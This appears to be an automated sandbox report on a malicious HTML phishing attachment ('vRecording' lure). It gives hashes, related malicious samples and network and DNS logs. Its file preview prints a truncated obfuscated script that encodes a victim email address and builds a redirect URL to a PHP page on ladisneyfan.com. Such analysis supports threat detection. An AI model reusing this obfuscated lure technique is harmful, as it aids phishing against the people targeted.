	https://antiphishing.vadesecure.com/v4?f=bnJjU3hQT3pQSmNQZVE3aOMl-Yxz6sxP-_mvIRuY-wdnZ1bXTFIOIwMxyCDi0KedKx4XzS44_P2zUeNIsKUb0ScW6k1yl1_sQ4IsBBcClSw_vWV34HFG0fKKBNYTYHpo&i=SGI0YVJGNmxZNE90Z2thMHUqf298Dc88cJEXrW3w1lA&k=dFBm&r=SW5LV3JodE9QZkRVZ3JEYa6kbR5XAzhHFJ0zbTQRADrRG7ugnfE15pwrEQUVhgv3E2tVXwBw8NfFSkf3wOZ0VA&s=ecaab139c1f3315ccc0d88a6451dccec431e8ce1d856e71e5109e33657c13a3c&u=https%3A%2F%2Fsender5.zohoinsights-crm.com%2Fck1%2F2d6f.327230a%2F5f929700-cca4-11ef-973d-525400f92481%2F4cb2ae4047e7a38310b2b2641663917c123a5dec%2F2%3Fe%3DGKxHQ%252FSSm8D%252B%252B3g8VEcICaLHKdekhRU94ImygZ37tRI%253D	Get hash	malicious	Unknown	Browse	40.113.110.67
	Mes_Drivers_3.0.4.exe	Get hash	malicious	Unknown	Browse	40.113.110.67
	c2.hta	Get hash	malicious	Remcos	Browse	40.113.110.67
	setup-avast-premium-x64.exe	Get hash	malicious	Unknown	Browse	40.113.110.67
	setup-avast-premium-x64.exe	Get hash	malicious	Unknown	Browse	40.113.110.67
	ZipThis.exe	Get hash	malicious	Unknown	Browse	40.113.110.67

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (398), with CRLF line terminators
Entropy (8bit):	6.027796049018015
TrID:	HyperText Markup Language (12001/1) 29.26% HyperText Markup Language (12001/1) 29.26% HyperText Markup Language (11001/1) 26.83% HyperText Markup Language (6006/1) 14.65%
File name:	vRecording__0023secs__Stgusa.html
File size:	721 bytes
MD5:	4393c8c305ba785b3251e1656e5f4da5
SHA1:	43cda53b1fd887aa0d6129126b6d746f2192a232
SHA256:	0048eca18544b13a6dc37a6284d77b835e77c216109701e9d14d56a2b76b9eb4
SHA512:	12619ef1ba2383505603d0986d31d460a1087e064c5838688b0127b4d93e9b7b26fd2c560ca105977b9e00506ed8831639114c1c1b27483760e3977b73ca392c
SSDEEP:	12:kxVPxRNyZPeB6V6zQmaT61BwzY2VifDBrSqlf+/YneJQOEWeyWsYhFKW9/I:kH5RGesV68jcBwzY2aw2f+QdOEWuxiWy
TLSH:	AF01652C8619C49F689117D73A4E852C08DB8250BC01C4747FDEB7811F58F0C88D90B8
File Content Preview:	<html><head><meta charset="UTF-8"></head><body><script>clover = '#cG9ydGxhbmRzYWxlc0BzdGd1c2EuY29t';....var cDiW = 'aG9vcG9lID0gJ2h0dHAnKyJzOi8iKyIvbGEiKyJkaXNuZXlmYSIrIm4uY28iPYDNYLSK2BtL3JlYCsnczQ0NC4nK2BwaHA/Mi1gKyc2CpgyJ8jqODc0NzQ3JytgMFUwu3DczM2FgKyc

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 16:01:03.763973951 CET	49674	443	192.168.2.6	173.222.162.64
Jan 7, 2025 16:01:03.763976097 CET	49673	443	192.168.2.6	173.222.162.64
Jan 7, 2025 16:01:04.092156887 CET	49672	443	192.168.2.6	173.222.162.64
Jan 7, 2025 16:01:08.594445944 CET	49712	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:08.594489098 CET	443	49712	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:08.594542027 CET	49712	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:08.595362902 CET	49712	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:08.595375061 CET	443	49712	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:08.740366936 CET	49713	443	192.168.2.6	69.49.245.172
Jan 7, 2025 16:01:08.740403891 CET	443	49713	69.49.245.172	192.168.2.6
Jan 7, 2025 16:01:08.740576029 CET	49713	443	192.168.2.6	69.49.245.172
Jan 7, 2025 16:01:08.740906000 CET	49713	443	192.168.2.6	69.49.245.172
Jan 7, 2025 16:01:08.740916014 CET	443	49713	69.49.245.172	192.168.2.6
Jan 7, 2025 16:01:09.402544022 CET	443	49712	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:09.402621984 CET	49712	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:09.451947927 CET	49712	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:09.451976061 CET	443	49712	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:09.452342987 CET	443	49712	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:09.458298922 CET	49712	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:09.458429098 CET	49712	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:09.458436012 CET	443	49712	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:09.458817005 CET	49712	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:09.503340006 CET	443	49712	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:09.632461071 CET	443	49712	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:09.632647038 CET	443	49712	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:09.632742882 CET	49712	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:09.645458937 CET	49712	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:09.645478964 CET	443	49712	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:12.350194931 CET	49719	443	192.168.2.6	142.250.186.132
Jan 7, 2025 16:01:12.350238085 CET	443	49719	142.250.186.132	192.168.2.6
Jan 7, 2025 16:01:12.350294113 CET	49719	443	192.168.2.6	142.250.186.132
Jan 7, 2025 16:01:12.350492954 CET	49719	443	192.168.2.6	142.250.186.132
Jan 7, 2025 16:01:12.350506067 CET	443	49719	142.250.186.132	192.168.2.6
Jan 7, 2025 16:01:12.983047962 CET	443	49719	142.250.186.132	192.168.2.6
Jan 7, 2025 16:01:12.983460903 CET	49719	443	192.168.2.6	142.250.186.132
Jan 7, 2025 16:01:12.983473063 CET	443	49719	142.250.186.132	192.168.2.6
Jan 7, 2025 16:01:12.984498978 CET	443	49719	142.250.186.132	192.168.2.6
Jan 7, 2025 16:01:12.984545946 CET	49719	443	192.168.2.6	142.250.186.132
Jan 7, 2025 16:01:12.989286900 CET	49719	443	192.168.2.6	142.250.186.132
Jan 7, 2025 16:01:12.989348888 CET	443	49719	142.250.186.132	192.168.2.6
Jan 7, 2025 16:01:13.031373024 CET	49719	443	192.168.2.6	142.250.186.132
Jan 7, 2025 16:01:13.031379938 CET	443	49719	142.250.186.132	192.168.2.6
Jan 7, 2025 16:01:13.078668118 CET	49719	443	192.168.2.6	142.250.186.132
Jan 7, 2025 16:01:13.373519897 CET	49674	443	192.168.2.6	173.222.162.64
Jan 7, 2025 16:01:13.373541117 CET	49673	443	192.168.2.6	173.222.162.64
Jan 7, 2025 16:01:13.706342936 CET	49672	443	192.168.2.6	173.222.162.64
Jan 7, 2025 16:01:15.417531013 CET	443	49707	173.222.162.64	192.168.2.6
Jan 7, 2025 16:01:15.417681932 CET	49707	443	192.168.2.6	173.222.162.64
Jan 7, 2025 16:01:17.408551931 CET	49752	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:17.408576012 CET	443	49752	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:17.408715010 CET	49752	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:17.409326077 CET	49752	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:17.409338951 CET	443	49752	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:18.261203051 CET	443	49752	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:18.261285067 CET	49752	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:18.266016006 CET	49752	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:18.266025066 CET	443	49752	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:18.266290903 CET	443	49752	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:18.268140078 CET	49752	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:18.268208027 CET	49752	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:18.268213034 CET	443	49752	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:18.268311977 CET	49752	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:18.311336040 CET	443	49752	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:18.443780899 CET	443	49752	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:18.444070101 CET	443	49752	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:18.444259882 CET	49752	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:18.445003986 CET	49752	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:18.445030928 CET	443	49752	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:18.445038080 CET	49752	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:22.886724949 CET	443	49719	142.250.186.132	192.168.2.6
Jan 7, 2025 16:01:22.886806965 CET	443	49719	142.250.186.132	192.168.2.6
Jan 7, 2025 16:01:22.886868000 CET	49719	443	192.168.2.6	142.250.186.132
Jan 7, 2025 16:01:24.764780998 CET	49719	443	192.168.2.6	142.250.186.132
Jan 7, 2025 16:01:24.764803886 CET	443	49719	142.250.186.132	192.168.2.6
Jan 7, 2025 16:01:32.179347038 CET	49849	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:32.179383993 CET	443	49849	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:32.179502964 CET	49849	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:32.180124998 CET	49849	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:32.180140972 CET	443	49849	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:33.046561003 CET	443	49849	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:33.046708107 CET	49849	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:33.052772999 CET	49849	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:33.052788019 CET	443	49849	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:33.053648949 CET	443	49849	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:33.055516958 CET	49849	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:33.055665970 CET	49849	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:33.055670977 CET	443	49849	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:33.055947065 CET	49849	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:33.099330902 CET	443	49849	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:33.235145092 CET	443	49849	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:33.235222101 CET	443	49849	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:33.235275030 CET	49849	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:33.235460997 CET	49849	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:33.235474110 CET	443	49849	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:38.747174978 CET	49713	443	192.168.2.6	69.49.245.172
Jan 7, 2025 16:01:38.747307062 CET	443	49713	69.49.245.172	192.168.2.6
Jan 7, 2025 16:01:38.747379065 CET	49713	443	192.168.2.6	69.49.245.172
Jan 7, 2025 16:01:47.757958889 CET	49941	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:47.757993937 CET	443	49941	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:47.758060932 CET	49941	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:47.758663893 CET	49941	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:47.758672953 CET	443	49941	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:48.551783085 CET	443	49941	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:48.551867962 CET	49941	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:48.553987980 CET	49941	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:48.554002047 CET	443	49941	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:48.554280996 CET	443	49941	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:48.556210995 CET	49941	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:48.556277037 CET	49941	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:48.556286097 CET	443	49941	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:48.556415081 CET	49941	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:48.603323936 CET	443	49941	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:48.726428986 CET	443	49941	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:48.726573944 CET	443	49941	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:48.726643085 CET	49941	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:48.726900101 CET	49941	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:01:48.726918936 CET	443	49941	40.113.110.67	192.168.2.6
Jan 7, 2025 16:01:49.379184961 CET	62027	53	192.168.2.6	1.1.1.1
Jan 7, 2025 16:01:49.384710073 CET	53	62027	1.1.1.1	192.168.2.6
Jan 7, 2025 16:01:49.384860039 CET	62027	53	192.168.2.6	1.1.1.1
Jan 7, 2025 16:01:49.384934902 CET	62027	53	192.168.2.6	1.1.1.1
Jan 7, 2025 16:01:49.389708996 CET	53	62027	1.1.1.1	192.168.2.6
Jan 7, 2025 16:01:49.829196930 CET	53	62027	1.1.1.1	192.168.2.6
Jan 7, 2025 16:01:49.830020905 CET	62027	53	192.168.2.6	1.1.1.1
Jan 7, 2025 16:01:49.843364954 CET	53	62027	1.1.1.1	192.168.2.6
Jan 7, 2025 16:01:49.843426943 CET	62027	53	192.168.2.6	1.1.1.1
Jan 7, 2025 16:02:09.489361048 CET	62081	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:02:09.489397049 CET	443	62081	40.113.110.67	192.168.2.6
Jan 7, 2025 16:02:09.489638090 CET	62081	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:02:09.490160942 CET	62081	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:02:09.490174055 CET	443	62081	40.113.110.67	192.168.2.6
Jan 7, 2025 16:02:10.314011097 CET	443	62081	40.113.110.67	192.168.2.6
Jan 7, 2025 16:02:10.314172029 CET	62081	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:02:10.316036940 CET	62081	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:02:10.316046953 CET	443	62081	40.113.110.67	192.168.2.6
Jan 7, 2025 16:02:10.316319942 CET	443	62081	40.113.110.67	192.168.2.6
Jan 7, 2025 16:02:10.318206072 CET	62081	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:02:10.318267107 CET	62081	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:02:10.318274975 CET	443	62081	40.113.110.67	192.168.2.6
Jan 7, 2025 16:02:10.318416119 CET	62081	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:02:10.363334894 CET	443	62081	40.113.110.67	192.168.2.6
Jan 7, 2025 16:02:10.498197079 CET	443	62081	40.113.110.67	192.168.2.6
Jan 7, 2025 16:02:10.498323917 CET	443	62081	40.113.110.67	192.168.2.6
Jan 7, 2025 16:02:10.498414040 CET	62081	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:02:10.498635054 CET	62081	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:02:10.498650074 CET	443	62081	40.113.110.67	192.168.2.6
Jan 7, 2025 16:02:12.404020071 CET	62082	443	192.168.2.6	142.250.186.132
Jan 7, 2025 16:02:12.404062033 CET	443	62082	142.250.186.132	192.168.2.6
Jan 7, 2025 16:02:12.404159069 CET	62082	443	192.168.2.6	142.250.186.132
Jan 7, 2025 16:02:12.404530048 CET	62082	443	192.168.2.6	142.250.186.132
Jan 7, 2025 16:02:12.404542923 CET	443	62082	142.250.186.132	192.168.2.6
Jan 7, 2025 16:02:13.031927109 CET	443	62082	142.250.186.132	192.168.2.6
Jan 7, 2025 16:02:13.032267094 CET	62082	443	192.168.2.6	142.250.186.132
Jan 7, 2025 16:02:13.032294989 CET	443	62082	142.250.186.132	192.168.2.6
Jan 7, 2025 16:02:13.032676935 CET	443	62082	142.250.186.132	192.168.2.6
Jan 7, 2025 16:02:13.032977104 CET	62082	443	192.168.2.6	142.250.186.132
Jan 7, 2025 16:02:13.033200026 CET	443	62082	142.250.186.132	192.168.2.6
Jan 7, 2025 16:02:13.074520111 CET	62082	443	192.168.2.6	142.250.186.132
Jan 7, 2025 16:02:22.957547903 CET	443	62082	142.250.186.132	192.168.2.6
Jan 7, 2025 16:02:22.957624912 CET	443	62082	142.250.186.132	192.168.2.6
Jan 7, 2025 16:02:22.957830906 CET	62082	443	192.168.2.6	142.250.186.132
Jan 7, 2025 16:02:24.764822960 CET	62082	443	192.168.2.6	142.250.186.132
Jan 7, 2025 16:02:24.764862061 CET	443	62082	142.250.186.132	192.168.2.6
Jan 7, 2025 16:02:39.322508097 CET	62084	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:02:39.322567940 CET	443	62084	40.113.110.67	192.168.2.6
Jan 7, 2025 16:02:39.322664976 CET	62084	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:02:39.323398113 CET	62084	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:02:39.323421955 CET	443	62084	40.113.110.67	192.168.2.6
Jan 7, 2025 16:02:40.152648926 CET	443	62084	40.113.110.67	192.168.2.6
Jan 7, 2025 16:02:40.152735949 CET	62084	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:02:40.156312943 CET	62084	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:02:40.156327963 CET	443	62084	40.113.110.67	192.168.2.6
Jan 7, 2025 16:02:40.156564951 CET	443	62084	40.113.110.67	192.168.2.6
Jan 7, 2025 16:02:40.158611059 CET	62084	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:02:40.158693075 CET	62084	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:02:40.158699036 CET	443	62084	40.113.110.67	192.168.2.6
Jan 7, 2025 16:02:40.158890009 CET	62084	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:02:40.203337908 CET	443	62084	40.113.110.67	192.168.2.6
Jan 7, 2025 16:02:40.333564043 CET	443	62084	40.113.110.67	192.168.2.6
Jan 7, 2025 16:02:40.333808899 CET	443	62084	40.113.110.67	192.168.2.6
Jan 7, 2025 16:02:40.333879948 CET	62084	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:02:40.334039927 CET	62084	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:02:40.334064960 CET	443	62084	40.113.110.67	192.168.2.6
Jan 7, 2025 16:02:41.934329987 CET	49703	443	192.168.2.6	40.126.32.138
Jan 7, 2025 16:02:41.939497948 CET	443	49703	40.126.32.138	192.168.2.6
Jan 7, 2025 16:02:41.939610958 CET	49703	443	192.168.2.6	40.126.32.138
Jan 7, 2025 16:02:44.402998924 CET	49706	443	192.168.2.6	40.126.32.138
Jan 7, 2025 16:02:44.408031940 CET	443	49706	40.126.32.138	192.168.2.6
Jan 7, 2025 16:02:44.408140898 CET	49706	443	192.168.2.6	40.126.32.138
Jan 7, 2025 16:03:17.022546053 CET	62085	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:03:17.022619963 CET	443	62085	40.113.110.67	192.168.2.6
Jan 7, 2025 16:03:17.022715092 CET	62085	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:03:17.023478031 CET	62085	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:03:17.023492098 CET	443	62085	40.113.110.67	192.168.2.6
Jan 7, 2025 16:03:17.799752951 CET	443	62085	40.113.110.67	192.168.2.6
Jan 7, 2025 16:03:17.799844980 CET	62085	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:03:17.802018881 CET	62085	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:03:17.802033901 CET	443	62085	40.113.110.67	192.168.2.6
Jan 7, 2025 16:03:17.802277088 CET	443	62085	40.113.110.67	192.168.2.6
Jan 7, 2025 16:03:17.804258108 CET	62085	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:03:17.804338932 CET	62085	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:03:17.804344893 CET	443	62085	40.113.110.67	192.168.2.6
Jan 7, 2025 16:03:17.804461956 CET	62085	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:03:17.851332903 CET	443	62085	40.113.110.67	192.168.2.6
Jan 7, 2025 16:03:17.974610090 CET	443	62085	40.113.110.67	192.168.2.6
Jan 7, 2025 16:03:17.975209951 CET	62085	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:03:17.975209951 CET	62085	443	192.168.2.6	40.113.110.67
Jan 7, 2025 16:03:17.975234032 CET	443	62085	40.113.110.67	192.168.2.6
Jan 7, 2025 16:03:17.975385904 CET	62085	443	192.168.2.6	40.113.110.67

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 16:01:08.307775021 CET	53	60725	1.1.1.1	192.168.2.6
Jan 7, 2025 16:01:08.309715033 CET	53	50685	1.1.1.1	192.168.2.6
Jan 7, 2025 16:01:08.552937031 CET	62712	53	192.168.2.6	1.1.1.1
Jan 7, 2025 16:01:08.553179026 CET	56431	53	192.168.2.6	1.1.1.1
Jan 7, 2025 16:01:08.736264944 CET	53	62712	1.1.1.1	192.168.2.6
Jan 7, 2025 16:01:08.739408016 CET	53	56431	1.1.1.1	192.168.2.6
Jan 7, 2025 16:01:09.360743046 CET	53	53163	1.1.1.1	192.168.2.6
Jan 7, 2025 16:01:12.342215061 CET	61561	53	192.168.2.6	1.1.1.1
Jan 7, 2025 16:01:12.342392921 CET	64403	53	192.168.2.6	1.1.1.1
Jan 7, 2025 16:01:12.349133968 CET	53	61561	1.1.1.1	192.168.2.6
Jan 7, 2025 16:01:12.349241018 CET	53	64403	1.1.1.1	192.168.2.6
Jan 7, 2025 16:01:12.661884069 CET	53	63773	1.1.1.1	192.168.2.6
Jan 7, 2025 16:01:26.380743980 CET	53	56797	1.1.1.1	192.168.2.6
Jan 7, 2025 16:01:45.333250046 CET	53	57332	1.1.1.1	192.168.2.6
Jan 7, 2025 16:01:49.378494978 CET	53	53831	1.1.1.1	192.168.2.6
Jan 7, 2025 16:02:08.007308960 CET	53	50790	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 7, 2025 16:01:08.552937031 CET	192.168.2.6	1.1.1.1	0x25f0	Standard query (0)	ladisneyfan.com	A (IP address)	IN (0x0001)	false
Jan 7, 2025 16:01:08.553179026 CET	192.168.2.6	1.1.1.1	0x6d7c	Standard query (0)	ladisneyfan.com	65	IN (0x0001)	false
Jan 7, 2025 16:01:12.342215061 CET	192.168.2.6	1.1.1.1	0x17ce	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jan 7, 2025 16:01:12.342392921 CET	192.168.2.6	1.1.1.1	0x784d	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 16:01:08.736264944 CET	1.1.1.1	192.168.2.6	0x25f0	No error (0)	ladisneyfan.com	69.49.245.172	A (IP address)	IN (0x0001)	false
Jan 7, 2025 16:01:12.349133968 CET	1.1.1.1	192.168.2.6	0x17ce	No error (0)	www.google.com	142.250.186.132	A (IP address)	IN (0x0001)	false
Jan 7, 2025 16:01:12.349241018 CET	1.1.1.1	192.168.2.6	0x784d	No error (0)	www.google.com		65	IN (0x0001)	false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.6	49712	40.113.110.67	443

Timestamp	Bytes transferred	Direction	Data
2025-01-07 15:01:09 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 57 6b 6a 45 71 64 45 51 61 30 75 66 59 64 45 53 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 38 39 31 61 65 32 63 62 37 65 36 30 36 65 61 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: WkjEqdEQa0ufYdES.1Context: 6891ae2cb7e606ea
2025-01-07 15:01:09 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2025-01-07 15:01:09 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 57 6b 6a 45 71 64 45 51 61 30 75 66 59 64 45 53 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 38 39 31 61 65 32 63 62 37 65 36 30 36 65 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 68 44 55 6b 50 71 78 56 2b 33 73 6b 6d 5a 33 65 69 6b 66 62 62 70 61 38 57 32 69 55 4d 66 33 42 5a 78 56 38 33 4d 75 73 78 6d 35 66 78 76 54 6c 6b 6d 6c 5a 6d 56 67 6e 30 6a 77 4a 61 56 48 6d 79 74 75 35 4a 6e 68 67 6a 73 53 68 47 4b 2b 6d 63 51 41 4a 59 77 58 77 77 69 47 31 6c 76 6d 2f 75 4d 54 6c 79 41 76 6b 61 37 6d 42 Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: WkjEqdEQa0ufYdES.2Context: 6891ae2cb7e606ea<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbhDUkPqxV+3skmZ3eikfbbpa8W2iUMf3BZxV83Musxm5fxvTlkmlZmVgn0jwJaVHmytu5JnhgjsShGK+mcQAJYwXwwiG1lvm/uMTlyAvka7mB
2025-01-07 15:01:09 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 57 6b 6a 45 71 64 45 51 61 30 75 66 59 64 45 53 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 36 38 39 31 61 65 32 63 62 37 65 36 30 36 65 61 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: WkjEqdEQa0ufYdES.3Context: 6891ae2cb7e606ea<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2025-01-07 15:01:09 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
